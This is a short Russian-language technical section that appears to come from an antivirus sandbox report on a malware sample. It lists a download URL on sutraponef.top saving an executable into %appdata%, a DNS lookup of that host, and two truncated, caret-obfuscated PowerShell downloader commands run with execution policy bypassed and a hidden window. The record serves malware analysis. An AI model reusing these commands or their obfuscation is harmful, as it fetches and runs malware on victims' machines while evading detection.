Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ERSHElL.EXE -e^xecU^TI^ONpOLic^y b^YpA^s^S^ -n^OP^rofIl^E^ -Wi^nd^oWst^YlE^ H^iDde^n^ ^(n^EW-^oBjEct^ Sys^Tem.neT.webcl^iEnt^).^d^ownLo^aD^fiLe('http://sutraponef.top/r...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ERSHElL.EXE -e^xecU^TI^ONpOLic^y b^YpA^s^S^ -n^OP^rofIl^E^ -Wi^nd^oWst^YlE^ H^iDde^n^ ^(n^EW-^oBjEct^ Sys^Tem.neT.webcl^iEnt^).^d^ownLo^aD^fiLe('http://sutraponef.top/r...' (со скрытым окном)